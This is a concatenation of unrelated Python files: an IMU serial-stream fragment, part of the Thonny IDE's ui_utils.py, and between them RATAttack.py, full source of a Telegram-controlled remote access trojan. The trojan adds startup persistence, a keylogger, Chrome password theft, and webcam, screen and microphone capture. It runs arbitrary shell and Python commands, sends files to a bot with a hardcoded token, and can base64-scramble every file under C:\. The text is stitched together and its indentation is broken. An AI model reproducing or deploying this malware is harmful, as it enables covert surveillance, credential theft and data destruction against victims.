if __name__ == '__main__':
q1 = queue.Queue()
print("Started")
# global IMUs
IMUs.append(IMU("COM5", frequency=10))
t1 = threading.Thread(target=IMUs[0].start_stream_to_queue, args=(q1,))
t1.start()
signal.signal(signal.SIGINT, signal_handler)
    while True:
        # q1.get() blocks until the IMU thread queues a sample, so no emptiness
        # check is needed afterwards (Queue.not_empty is an internal Condition).
        header1, data1 = q1.get()
        #TODO: Exit gracefully
        print("% 9f,% 9f,% 9f,% 9f,% 9f,% 9f,% 9f" % tuple(data1))
'''
q2 = queue.Queue()
t2 = threading.Thread(target=run, args = ("COM4", q2,))
'''
|
RATAttack.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, os.path, platform, ctypes
os.environ["PBR_VERSION"]='5.0.0'
import logging
from consoleTools import consoleDisplay as cd
from PIL import ImageGrab # /capture_pc
from shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv
from sys import argv, path, stdout # console output
from json import loads # reading json from ipinfo.io
from winshell import startup # persistence
from tendo import singleton # this makes the application exit if there's another instance already running
from win32com.client import Dispatch # WScript.Shell
from time import strftime, sleep
from subprocess import Popen, PIPE # /cmd_exec
import psutil # updating
import shutil
import win32clipboard # register clipboard
import sqlite3 # get chrome passwords
import win32crypt # get chrome passwords
import base64 # /encrypt_all
import datetime # /schedule
import time
import threading # /proxy, /schedule
import proxy
import pyaudio, wave # /hear
import telepot, requests # telepot => telegram, requests => file download
from telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton
import pyHook, pythoncom # keylogger
import socket # internal IP
import getpass # get username
import collections
import urllib# wallpaper
import cv2#webcam
from datetime import datetime
from ctypes import * #fixing pyinstaller - we need to import all the ctypes to get api-ms-win-crt-*, you will also need https://www.microsoft.com/en-US/download/details.aspx?id=48145
cd.log('i','Starting')
me = singleton.SingleInstance()
# REPLACE THE LINE BELOW WITH THE TOKEN OF THE BOT YOU GENERATED!
token = '794617265:AAHKR0gMla6CQK_lOCqhCNJVhjdnLUeee7o'
# This will be used for setting paths and related file io -- change to whatever you want
app_name = 'ABCdef123'
# ADD YOUR chat_id in string format TO THE LIST BELOW IF YOU WANT YOUR BOT TO ONLY RESPOND TO ONE PERSON!
known_ids = []
#known_ids.append(os.environ['TELEGRAM_CHAT_ID']if 'TELEGRAM_CHAT_ID' in os.environ) # make sure to remove this line if you don't have this environment variable
appdata_roaming_folder = os.environ['APPDATA'] # = 'C:\Users\Username\AppData\Roaming'
# HIDING OPTIONS
# ---------------------------------------------
hide_folder = appdata_roaming_folder + '\\' + app_name # = 'C:\Users\Username\AppData\Roaming\Portal'
compiled_name = app_name + '.exe' # Name of compiled .exe to hide in hide_folder, i.e 'C:\Users\Username\AppData\Roaming\Portal\portal.exe'
# ---------------------------------------------
target_shortcut = startup() + '\\' + compiled_name.replace('.exe', '.lnk')
if not os.path.exists(hide_folder):
os.makedirs(hide_folder)
hide_compiled = hide_folder + '\\' + compiled_name
copyfile(argv[0], hide_compiled)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(target_shortcut)
shortcut.Targetpath = hide_compiled
shortcut.WorkingDirectory = hide_folder
shortcut.save()
if not os.path.exists('logs/'):
os.mkdir('logs/')
if not os.path.exists('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d')))):
f=open('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d'))))
f.close()
global mouseFrozen
destroy = False
keyboardFrozen = False
mouseFrozen = False
curr_window = None
user = os.environ.get("USERNAME") # Windows username to append keylogs
schedule = {}
log_file = hide_folder + '\\.user'
keylogs_file = hide_folder + '\\.keylogs'
with open(log_file, "a") as writing:
writing.write("-------------------------------------------------\n")
writing.write(user + " Log: " + strftime("%b %d@%H:%M") + "\n\n")
logging.basicConfig(filename=log_file,level=logging.DEBUG)
def encode(file):
f = open(file)
data = f.read()
f.close()
encodedBytes = base64.b64encode(data)
#remove old file
os.remove(file)
#tag new file
file = file + '.nxr'
t = open(file, "w+")
t.write(encodedBytes)
t.close()
def decode(file):
f = open(file)
data = f.read()
f.close()
decodedBytes = base64.b64decode(data)
#remove old file
os.remove(file)
#tag new file
file = file.replace('.nxr', '')
t = open(file, "w+")
t.write(decodedBytes)
t.close()
def runStackedSchedule(everyNSeconds):
for k in schedule.keys():
if k < datetime.datetime.now():
handle(schedule[k])
del schedule[k]
threading.Timer(everyNSeconds, runStackedSchedule).start()
def internalIP():
internal_ip = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
internal_ip.connect(('google.com', 0))
return internal_ip.getsockname()[0]
def checkchat_id(chat_id):
return len(known_ids) == 0 or str(chat_id) in known_ids
def get_curr_window():
user32 = ctypes.windll.user32
kernel32 = ctypes.windll.kernel32
hwnd = user32.GetForegroundWindow()
pid = ctypes.c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
process_id = "%d" % pid.value
executable = ctypes.create_string_buffer(512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
ctypes.windll.psapi.GetModuleBaseNameA(h_process, None, ctypes.byref(executable), 512)
window_title = ctypes.create_string_buffer(512)
length = user32.GetWindowTextA(hwnd, ctypes.byref(window_title), 512)
pid_info = "\n[ PID %s - %s - %s ]" % (process_id, executable.value, window_title.value)
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
return pid_info
def false_event(event):
return False
def true_event(event):
return True
def pressed_chars(event):
data = None
global curr_window
if event.WindowName != curr_window:
curr_window = event.WindowName
fp = open(keylogs_file, 'a')
data = get_curr_window()
fp.write(data + "\n")
fp.close()
if event and type(event.Ascii) == int:
f = open(keylogs_file,"a")
if len(event.GetKey()) > 1:
tofile = '<'+event.GetKey()+'>'
else:
tofile = event.GetKey()
if tofile == '<Return>':
print(tofile)
else:
stdout.write(tofile)
f.write(tofile)
f.close()
return not keyboardFrozen
def split_string(n, st):
lst = ['']
for i in str(st):
l = len(lst) - 1
if len(lst[l]) < n:
lst[l] += i
else:
lst += [i]
return lst
def send_safe_message(bot, chat_id, message):
while(True):
try:
cd.log('n','Message sent:\n{}'.format(bot.sendMessage(chat_id, message)),True)
break
except:
pass
def handle(msg):
chat_id = msg['chat']['id']
if checkchat_id(chat_id):
response = ''
if 'text' in msg:
cd.log('n','\n\t\tGot message from ' + str(chat_id) + ': ' + msg['text'] + '\n\n',True)
command = msg['text']
try:
if command == '/arp':
response = ''
bot.sendChatAction(chat_id, 'typing')
lines = os.popen('arp -a -N ' + internalIP())
for line in lines:
line.replace('\n\n', '\n')
response += line
elif command == '/capture_webcam':
bot.sendChatAction(chat_id, 'typing')
camera = cv2.VideoCapture(0)
while True:
return_value,image = camera.read()
gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
cv2.imshow('image',gray)
if cv2.waitKey(1)& 0xFF == ord('s'):
cv2.imwrite('webcam.jpg',image)
break
camera.release()
cv2.destroyAllWindows()
bot.sendChatAction(chat_id, 'upload_photo')
bot.sendDocument(chat_id, open('webcam.jpg', 'rb'))
os.remove('webcam.jpg')
elif command == '/capture_pc':
bot.sendChatAction(chat_id, 'typing')
screenshot = ImageGrab.grab()
screenshot.save('screenshot.jpg')
bot.sendChatAction(chat_id, 'upload_photo')
bot.sendDocument(chat_id, open('screenshot.jpg', 'rb'))
os.remove('screenshot.jpg')
elif command.startswith('/cmd_exec'):
cd.log('w','Command exec prep')
process = Popen(['cmd'], stdin=PIPE, stdout=PIPE)
command = command.replace('/cmd_exec', '')
cd.log('w','Executing the command '+command)
if len(command) > 1:
process.stdin.write(bytes(command + '\n'))
process.stdin.close()
lines = process.stdout.readlines()
for l in lines:
response += l
else:
response = '/cmd_exec dir'
elif command.startswith('/cd'):
command = command.replace('/cd ','')
try:
os.chdir(command)
response = os.getcwd() + '>'
except:
response = 'No subfolder matching ' + command
elif command.startswith('/delete'):
command = command.replace('/delete', '')
path_file = command.strip()
try:
os.remove(path_file)
response = 'Succesfully removed file'
except:
try:
os.rmdir(path_file)
response = 'Succesfully removed folder'
except:
try:
shutil.rmtree(path_file)
response = 'Succesfully removed folder and it\'s files'
except:
response = 'File not found'
elif command == '/dns':
bot.sendChatAction(chat_id, 'typing')
lines = os.popen('ipconfig /displaydns')
for line in lines:
line.replace('\n\n', '\n')
response += line
elif command.startswith('/download'):
bot.sendChatAction(chat_id, 'typing')
path_file = command.replace('/download', '')
path_file = path_file[1:]
if path_file == '':
response = '/download C:/path/to/file.name or /download file.name'
else:
bot.sendChatAction(chat_id, 'upload_document')
try:
bot.sendDocument(chat_id, open(path_file, 'rb'))
except:
try:
bot.sendDocument(chat_id, open(hide_folder + '\\' + path_file))
response = 'Found in hide_folder: ' + hide_folder
except:
response = 'Could not find ' + path_file
elif command.endswith('code_all'):
cd.log('w','Data encryption option.')
parentDirectory = 'C:\\'
for root, dirs, files in os.walk(parentDirectory):
for afile in files:
full_path = os.path.join(root, afile)
if command.startswith('/en'):
cd.log('w','WARNING ABOUT TO ENCRYPT DATA!!!! IN '+str(full_path))
encode(full_path)
elif command.startswith('/de') and full_path.endswith('.nxr'):#our extension (been encoded)
decode(full_path)
response = 'Files ' + command[1:3] + 'coded succesfully.'
elif command.startswith('/cp'):
command = command.replace('/cp', '')
command = command.strip()
if len(command) > 0:
try:
file1 = command.split('"')[1]
file2 = command.split('"')[3]
copyfile(file1, file2)
response = 'Files copied succesfully.'
except Exception as e:
response = 'Error: \n' + str(e)
else:
response = 'Usage: \n/cp "C:/Users/DonaldTrump/Desktop/porn.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"'
response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'
elif command.endswith('freeze_keyboard'):
global keyboardFrozen
keyboardFrozen = not command.startswith('/un')
hookManager.KeyAll = lambda event: not keyboardFrozen
response = 'Keyboard is now '
if keyboardFrozen:
response += 'disabled. To enable, use /unfreeze_keyboard'
else:
cd.log('w','Keyboard frozen')
response += 'enabled'
elif command.endswith('freeze_mouse'):
if mouseFrozen == False:
mse = pyHook.HookManager()
mse.MouseAll = false_event
mse.KeyAll = false_event
mse.HookMouse()
mse.HookKeyboard()
pythoncom.PumpMessages()
response += 'enabled. To disable use /unfreeze_mouse'
elif mouseFrozen == True:
cd.log('w','Keyboard frozen')
response += 'enabled. To disable, use /unfreeze_mouse'
else:
response += 'The script has commited the act of death'
elif command.endswith('unfreeze_mouse'):
if mouseFrozen == True:
mse = pyHook.HookManager()
mse.MouseAll = true_event
mse.KeyAll = true_event
mse.HookMouse()
mse.HookKeyboard()
pythoncom.PumpMessages()
response += 'disabled. To enable use /freeze_mouse'
elif mouseFrozen == False:
response += 'already disabled. To enable, use /freeze_mouse'
else:
response += 'The script has commited the act of death'
elif command == '/get_chrome':
con = sqlite3.connect(os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data')
cursor = con.cursor()
cursor.execute("SELECT origin_url,username_value,password_value from logins;")
for users in cursor.fetchall():
response += 'Website: ' + users[0] + '\n'
response += 'Username: ' + users[1] + '\n'
response += 'Password: ' + str(win32crypt.CryptUnprotectData(users[2], None, None, None, 0)) + '\n\n'
# """
# pass
elif command.startswith('/hear'):
try:
SECONDS = -1
try:
SECONDS = int(command.replace('/hear','').strip())
except:
SECONDS = 5
CHANNELS = 2
CHUNK = 1024
FORMAT = pyaudio.paInt16
RATE = 44100
audio = pyaudio.PyAudio()
bot.sendChatAction(chat_id, 'typing')
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True,
frames_per_buffer=CHUNK)
frames = []
for i in range(0, int(RATE / CHUNK * SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
audio.terminate()
wav_path = hide_folder + '\\mouthlogs.wav'
waveFile = wave.open(wav_path, 'wb')
waveFile.setnchannels(CHANNELS)
waveFile.setsampwidth(audio.get_sample_size(FORMAT))
waveFile.setframerate(RATE)
waveFile.writeframes(b''.join(frames))
waveFile.close()
bot.sendChatAction(chat_id, 'upload_document')
except OSError:
cd.log('e','Unable to listen in - there is probably no input device.')
response = 'unable to listen in - there is probably no input device'
#bot.sendAudio(chat_id, audio=open(wav_path, 'rb'))
elif command == '/ip_info':
bot.sendChatAction(chat_id, 'find_location')
info = requests.get('http://ipinfo.io').text #json format
location = (loads(info)['loc']).split(',')
bot.sendLocation(chat_id, location[0], location[1])
import string
import re
response = 'External IP: '
response += "".join(filter(lambda char: char in string.printable, info))
response = re.sub('[:,{}\t\"]', '', response)
response += '\n' + 'Internal IP: ' + '\n\t' + internalIP()
elif command == '/keylogs':
bot.sendChatAction(chat_id, 'upload_document')
bot.sendDocument(chat_id, open(keylogs_file, "rb"))
elif command.startswith('/ls'):
bot.sendChatAction(chat_id, 'typing')
command = command.replace('/ls', '')
command = command.strip()
files = []
if len(command) > 0:
files = os.listdir(command)
else:
files = os.listdir(os.getcwd())
human_readable = ''
for file in files:
human_readable += file + '\n'
response = human_readable
elif command.startswith('/msg_box'):
message = command.replace('/msg_box', '')
if message == '':
response = '/msg_box yourText'
else:
ctypes.windll.user32.MessageBoxW(0, message, u'Information', 0x40)
response = 'MsgBox displayed'
elif command.startswith('/mv'):
command = command.replace('/mv', '')
if len(command) > 0:
try:
file1 = command.split('"')[1]
file2 = command.split('"')[3]
move(file1, file2)
response = 'Files moved succesfully.'
except Exception as e:
response = 'Error: \n' + str(e)
else:
response = 'Usage: \n/mv "C:/Users/DonaldTrump/Desktop/porn.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"'
response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'
elif command == '/pc_info':
bot.sendChatAction(chat_id, 'typing')
info = ''
for pc_info in platform.uname():
info += '\n' + pc_info
info += '\n' + 'Username: ' + getpass.getuser()
response = info
elif command == '/ping':
response = platform.uname()[1] + ': I\'m up'
elif command.startswith('/play'):
command = command.replace('/play', '')
command = command.strip()
if len(command) > 0:
systemCommand = 'start \"\" \"https://www.youtube.com/embed/'
systemCommand += command
systemCommand += '?autoplay=1&showinfo=0&controls=0\"'
if os.system(systemCommand) == 0:
response = 'YouTube video is now playing'
else:
response = 'Failed playing YouTube video'
else:
response = '/play <VIDEOID>\n/play A5ZqNOJbamU'
elif command == '/proxy':
threading.Thread(target=proxy.main).start()
info = requests.get('http://ipinfo.io').text #json format
ip = (loads(info)['ip'])
response = 'Proxy succesfully setup on ' + ip + ':8081'
elif command == '/pwd':
response = os.getcwd()
elif command.startswith('/python_exec'):
command = command.replace('/python_exec','').strip()
if len(command) == 0:
response = 'Usage: /python_exec print(\'printing\')'
else:
cd.log('w','Executing python command')
from StringIO import StringIO
import sys
old_stderr = sys.stderr
old_stdout = sys.stdout
sys.stderr = mystderr = StringIO()
sys.stdout = mystdout = StringIO()
exec(command in globals())
if mystderr.getvalue() != None:
response += mystderr.getvalue()
if mystdout.getvalue() != None:
response += mystdout.getvalue()
sys.stderr = old_stderr
sys.stdout = old_stdout
if response == '':
response = 'Expression executed. No return or malformed expression.'
elif command == '/reboot':
bot.sendChatAction(chat_id, 'typing')
command = os.popen('shutdown /r /f /t 0')
response = 'Computer will be restarted NOW.'
elif command.startswith('/run'):
bot.sendChatAction(chat_id, 'typing')
path_file = command.replace('/run', '')
path_file = path_file[1:]
if path_file == '':
response = '/run_file C:/path/to/file'
else:
try:
os.startfile(path_file)
response = 'File ' + path_file + ' has been run'
except:
try:
os.startfile(hide_folder + '\\' + path_file)
response = 'File ' + path_file + ' has been run from hide_folder'
except:
response = 'File not found'
elif command.startswith('/schedule'):
command = command.replace('/schedule', '')
if command == '':
response = '/schedule 2017 12 24 23 59 /msg_box happy christmas'
else:
scheduleDateTimeStr = command[1:command.index('/') - 1]
scheduleDateTime = datetime.datetime.strptime(scheduleDateTimeStr, '%Y %m %d %H %M')
scheduleMessage = command[command.index('/'):]
schedule[scheduleDateTime] = {'text' : scheduleMessage, 'chat' : { 'id' : chat_id }}
response = 'Schedule set: ' + scheduleMessage
runStackedSchedule(10)
elif command == '/self_destruct':
bot.sendChatAction(chat_id, 'typing')
global destroy
destroy = True
response = 'You sure? Type \'/destroy\' to proceed.'
elif command == '/shutdown':
bot.sendChatAction(chat_id, 'typing')
command = os.popen('shutdown /s /f /t 0')
response = 'Computer will be shutdown NOW.'
elif command == '/destroy' and destroy == True:
bot.sendChatAction(chat_id, 'typing')
if os.path.exists(hide_folder):
rmtree(hide_folder)
if os.path.isfile(target_shortcut):
os.remove(target_shortcut)
os._exit(0)
elif command == '/tasklist':
lines = os.popen('tasklist /FI \"STATUS ne NOT RESPONDING\"')
response2 = ''
for line in lines:
line.replace('\n\n', '\n')
if len(line)>2000:
response2 +=line
else:
response += line
response += '\n' + response2
elif command.startswith('/to'):
command = command.replace('/to','')
import winsound
winsound.Beep(440, 300)
if command == '':
response = '/to <COMPUTER_1_NAME>, <COMPUTER_2_NAME> /msg_box Hello HOME-PC and WORK-PC'
else:
targets = command[:command.index('/')]
if platform.uname()[1] in targets:
command = command.replace(targets, '')
msg = {'text' : command, 'chat' : { 'id' : chat_id }}
handle(msg)
elif command == '/update':
proc_name = app_name + '.exe'
if not os.path.exists(hide_folder + '\\updated.exe'):
response = 'Send updated.exe first.'
else:
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == proc_name:
proc.kill()
os.rename(hide_folder + '\\' + proc_name, hide_folder + '\\' + proc_name + '.bak')
os.rename(hide_folder + '\\updated.exe', hide_folder + '\\' + proc_name)
os.system(hide_folder + '\\' + proc_name)
sys.exit()
elif command.startswith('/wallpaper'):
command = command.replace('/wallpaper', '')
command = command.strip()
if len(command) == 0:
response = 'Usage: /wallpaper C:/Users/User/Desktop/porn.jpg'
elif command.startswith('http'):
image = command.rsplit('/',1)[1]
image = hide_folder + '/' + image
urllib.urlretrieve(command, image)
ctypes.windll.user32.SystemParametersInfoW(20, 0, image, 3)
else:
ctypes.windll.user32.SystemParametersInfoW(20, 0, command.replace('/', '//'), 3)
response = 'Wallpaper succesfully set.'
elif command == '/help':
# functionalities dictionary: command:arguments
functionalities = { '/arp' : '', \
'/capture_pc' : '', \
'/cmd_exec' : '<command_chain>', \
'/cd':'<target_dir>', \
'/decode_all':'', \
'/delete':'<target_file>', \
'/dns':'', \
'/download':'<target_file>', \
'/encode_all':'', \
'/freeze_keyboard':'', \
'/freeze_mouse':'', \
'/get_chrome':'', \
'/hear':'[time in seconds, default=5s]', \
'/ip_info':'', \
'/keylogs':'', \
'/ls':'[target_folder]', \
'/msg_box':'<text>', \
'/pc_info':'', \
'/play':'<youtube_videoId>', \
'/proxy':'', \
'/pwd':'', \
'/python_exec':'<command_chain>', \
'/reboot':'', \
'/run':'<target_file>', \
'/self_destruct':'', \
'/shutdown':'', \
'/tasklist':'', \
'/to':'<target_computer>, [other_target_computer]',\
'/update':'',\
'/wallpaper':'<target_file>'}
response = "\n".join(command + ' ' + description for command,description in sorted(functionalities.items()))
else: # redirect to /help
cd.log('w','BOT MISUSE: Invalid command')
msg = {'text' : '/help', 'chat' : { 'id' : chat_id }}
handle(msg)
except Exception as e:
cd.log('e','BOT MISUSE: Unknown error running command or function.')
cd.log('z','Details from previous error'+str(e))
#raise
cd.log('n','Command {} ran'.format(command))
else: # Upload a file to target
file_name = ''
file_id = None
if 'document' in msg:
file_name = msg['document']['file_name']
file_id = msg['document']['file_id']
elif 'photo' in msg:
file_time = int(time.time())
file_id = msg['photo'][1]['file_id']
file_name = file_id + '.jpg'
file_path = bot.getFile(file_id=file_id)['file_path']
link = 'https://api.telegram.org/file/bot' + str(token) + '/' + file_path
file = (requests.get(link, stream=True)).raw
with open(hide_folder + '\\' + file_name, 'wb') as out_file:
copyfileobj(file, out_file)
response = 'File saved as ' + file_name
if response != '':
responses = split_string(4096, response)
for resp in responses:
send_safe_message(bot, chat_id, resp)#
if token == 'xx:xx': cd.log('e','Token has not been set, open up RATAttack.py and change the token - then recompile (if applicable).'); raise Exception('Token not set')
cd.log('s','Setup done')
cd.log('i','Starting')
bot = telepot.Bot(token)
bot.message_loop(handle)
if len(known_ids) > 0:
helloWorld = platform.uname()[1] + ": I'm up."
for known_id in known_ids: send_safe_message(bot, known_id, helloWorld)
print(helloWorld)
cd.log('s','Started')
cd.log('i','Listening for commands on ' + platform.uname()[1] + '...')
hookManager = pyHook.HookManager()
hookManager.KeyDown = pressed_chars
hookManager.HookKeyboard()
pythoncom.PumpMessages()
|
ui_utils.py
|
# -*- coding: utf-8 -*-
import collections
import logging
import os
import platform
import re
import shutil
import signal
import subprocess
import textwrap
import threading
import time
import tkinter as tk
import tkinter.font
import traceback
from tkinter import filedialog, messagebox, ttk
from typing import Callable, List, Optional, Tuple, Union # @UnusedImport
from thonny import get_workbench, misc_utils, tktextext
from thonny.common import TextRange
from thonny.misc_utils import running_on_linux, running_on_mac_os, running_on_windows
from thonny.tktextext import TweakableText
import sys
from _tkinter import TclError
import webbrowser
class CustomMenubar(ttk.Frame):
def __init__(self, master):
ttk.Frame.__init__(self, master, style="CustomMenubar.TFrame")
self._menus = []
self._opened_menu = None
ttk.Style().map(
"CustomMenubarLabel.TLabel",
background=[
("!active", lookup_style_option("Menubar", "background", "gray")),
(
"active",
lookup_style_option("Menubar", "activebackground", "LightYellow"),
),
],
foreground=[
("!active", lookup_style_option("Menubar", "foreground", "black")),
("active", lookup_style_option("Menubar", "activeforeground", "black")),
],
)
def add_cascade(self, label, menu):
label_widget = ttk.Label(
self,
style="CustomMenubarLabel.TLabel",
text=label,
padding=[6, 3, 6, 2],
font="TkDefaultFont",
)
if len(self._menus) == 0:
padx = (6, 0)
else:
padx = 0
label_widget.grid(row=0, column=len(self._menus), padx=padx)
def enter(event):
label_widget.state(("active",))
# Don't know how to open this menu when another menu is open
# another tk_popup just doesn't work unless old menu is closed by click or Esc
# https://stackoverflow.com/questions/38081470/is-there-a-way-to-know-if-tkinter-optionmenu-dropdown-is-active
# unpost doesn't work in Win and Mac: https://www.tcl.tk/man/tcl8.5/TkCmd/menu.htm#M62
# print("ENTER", menu, self._opened_menu)
if self._opened_menu is not None:
self._opened_menu.unpost()
click(event)
def leave(event):
label_widget.state(("!active",))
def click(event):
try:
# print("Before")
self._opened_menu = menu
menu.tk_popup(
label_widget.winfo_rootx(),
label_widget.winfo_rooty() + label_widget.winfo_height(),
)
finally:
# print("After")
self._opened_menu = None
label_widget.bind("<Enter>", enter, True)
label_widget.bind("<Leave>", leave, True)
label_widget.bind("<1>", click, True)
self._menus.append(menu)
class AutomaticPanedWindow(tk.PanedWindow):
"""
    Enables inserting panes according to their position_key values.
Automatically adds/removes itself to/from its master AutomaticPanedWindow.
Fixes some style glitches.
"""
def __init__(self, master, position_key=None, preferred_size_in_pw=None, **kwargs):
tk.PanedWindow.__init__(self, master, **kwargs)
self._pane_minsize = 100
self.position_key = position_key
self._restoring_pane_sizes = False
self._last_window_size = (0, 0)
self._full_size_not_final = True
self._configure_binding = self.bind("<Configure>", self._on_window_resize, True)
self._update_appearance_binding = self.bind(
"<<ThemeChanged>>", self._update_appearance, True
)
self.bind("<B1-Motion>", self._on_mouse_dragged, True)
self._update_appearance()
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def insert(self, pos, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
if pos == "auto":
# According to documentation I should use self.panes()
# but this doesn't return expected widgets
for sibling in sorted(
self.pane_widgets(),
key=lambda p: p.position_key if hasattr(p, "position_key") else 0,
):
if (
not hasattr(sibling, "position_key")
                    or sibling.position_key is None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
if isinstance(pos, tk.Widget):
kw["before"] = pos
self.add(child, **kw)
def add(self, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
tk.PanedWindow.add(self, child, **kw)
self._update_visibility()
self._check_restore_preferred_sizes()
def remove(self, child):
tk.PanedWindow.remove(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def forget(self, child):
tk.PanedWindow.forget(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def destroy(self):
self.unbind("<Configure>", self._configure_binding)
self.unbind("<<ThemeChanged>>", self._update_appearance_binding)
tk.PanedWindow.destroy(self)
def is_visible(self):
if not isinstance(self.master, AutomaticPanedWindow):
return self.winfo_ismapped()
else:
return self in self.master.pane_widgets()
def pane_widgets(self):
result = []
for pane in self.panes():
# pane is not the widget but some kind of reference object
assert not isinstance(pane, tk.Widget)
result.append(self.nametowidget(str(pane)))
return result
def _on_window_resize(self, event):
if event.width < 10 or event.height < 10:
return
window = self.winfo_toplevel()
window_size = (window.winfo_width(), window.winfo_height())
initializing = hasattr(window, "initializing") and window.initializing
if (
not initializing
and not self._restoring_pane_sizes
and (window_size != self._last_window_size or self._full_size_not_final)
):
self._check_restore_preferred_sizes()
self._last_window_size = window_size
def _on_mouse_dragged(self, event):
if event.widget == self and not self._restoring_pane_sizes:
self._update_preferred_sizes()
def _update_preferred_sizes(self):
for pane in self.pane_widgets():
if getattr(pane, "preferred_size_in_pw", None) is not None:
if self.cget("orient") == "horizontal":
current_size = pane.winfo_width()
else:
current_size = pane.winfo_height()
if current_size > 20:
pane.preferred_size_in_pw = current_size
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=current_size)
# else:
# self.paneconfig(pane, height=current_size)
#
# else:
# self.paneconfig(pane, width=1000, height=1000)
def _check_restore_preferred_sizes(self):
window = self.winfo_toplevel()
if getattr(window, "initializing", False):
return
try:
self._restoring_pane_sizes = True
self._restore_preferred_sizes()
finally:
self._restoring_pane_sizes = False
def _restore_preferred_sizes(self):
total_preferred_size = 0
panes_without_preferred_size = []
panes = self.pane_widgets()
for pane in panes:
if not hasattr(pane, "preferred_size_in_pw"):
# child isn't fully constructed yet
return
if pane.preferred_size_in_pw is None:
panes_without_preferred_size.append(pane)
# self.paneconfig(pane, width=1000, height=1000)
else:
total_preferred_size += pane.preferred_size_in_pw
# Without updating pane width/height attribute
# the preferred size may lose effect when squeezing
# non-preferred panes too small. Also zooming/unzooming
# changes the supposedly fixed panes ...
#
# but
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=pane.preferred_size_in_pw)
# else:
# self.paneconfig(pane, height=pane.preferred_size_in_pw)
assert len(panes_without_preferred_size) <= 1
size = self._get_size()
if size is None:
return
        leftover_size = size - total_preferred_size
used_size = 0
for i, pane in enumerate(panes[:-1]):
used_size += pane.preferred_size_in_pw or leftover_size
self._place_sash(i, used_size)
used_size += int(str(self.cget("sashwidth")))
def _get_size(self):
if self.cget("orient") == tk.HORIZONTAL:
result = self.winfo_width()
else:
result = self.winfo_height()
if result < 20:
# Not ready yet
return None
else:
return result
def _place_sash(self, i, distance):
if self.cget("orient") == tk.HORIZONTAL:
self.sash_place(i, distance, 0)
else:
self.sash_place(i, 0, distance)
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.panes()) == 0 and self.is_visible():
self.master.forget(self)
if len(self.panes()) > 0 and not self.is_visible():
self.master.insert("auto", self)
def _update_appearance(self, event=None):
self.configure(sashwidth=lookup_style_option("Sash", "sashthickness", 10))
self.configure(background=lookup_style_option("TPanedWindow", "background"))
class ClosableNotebook(ttk.Notebook):
def __init__(self, master, style="ButtonNotebook.TNotebook", **kw):
super().__init__(master, style=style, **kw)
self.tab_menu = self.create_tab_menu()
self._popup_index = None
self.pressed_index = None
self.bind("<ButtonPress-1>", self._letf_btn_press, True)
self.bind("<ButtonRelease-1>", self._left_btn_release, True)
if running_on_mac_os():
self.bind("<ButtonPress-2>", self._right_btn_press, True)
self.bind("<Control-Button-1>", self._right_btn_press, True)
else:
self.bind("<ButtonPress-3>", self._right_btn_press, True)
# self._check_update_style()
def create_tab_menu(self):
menu = tk.Menu(
self.winfo_toplevel(), tearoff=False, **get_style_configuration("Menu")
)
menu.add_command(label="Close", command=self._close_tab_from_menu)
menu.add_command(label="Close others", command=self._close_other_tabs)
menu.add_command(label="Close all", command=self.close_tabs)
return menu
    def _left_btn_press(self, event):
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
if "closebutton" in elem:
self.state(["pressed"])
self.pressed_index = index
except Exception:
# may fail, if clicked outside of tab
return
def _left_btn_release(self, event):
if not self.instate(["pressed"]):
return
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
except Exception:
# may fail, when mouse is dragged
return
else:
if "closebutton" in elem and self.pressed_index == index:
self.close_tab(index)
self.state(["!pressed"])
finally:
self.pressed_index = None
def _right_btn_press(self, event):
try:
index = self.index("@%d,%d" % (event.x, event.y))
self._popup_index = index
self.tab_menu.tk_popup(*self.winfo_toplevel().winfo_pointerxy())
except Exception:
logging.exception("Opening tab menu")
def _close_tab_from_menu(self):
self.close_tab(self._popup_index)
def _close_other_tabs(self):
self.close_tabs(self._popup_index)
def close_tabs(self, except_index=None):
for tab_index in reversed(range(len(self.winfo_children()))):
if except_index is not None and tab_index == except_index:
continue
else:
self.close_tab(tab_index)
def close_tab(self, index):
child = self.get_child_by_index(index)
if hasattr(child, "close"):
child.close()
else:
self.forget(index)
child.destroy()
def get_child_by_index(self, index):
tab_id = self.tabs()[index]
if tab_id:
return self.nametowidget(tab_id)
else:
return None
def get_current_child(self):
child_id = self.select()
if child_id:
return self.nametowidget(child_id)
else:
return None
def focus_set(self):
editor = self.get_current_child()
if editor:
editor.focus_set()
else:
super().focus_set()
def _check_update_style(self):
style = ttk.Style()
if "closebutton" in style.element_names():
# It's done already
return
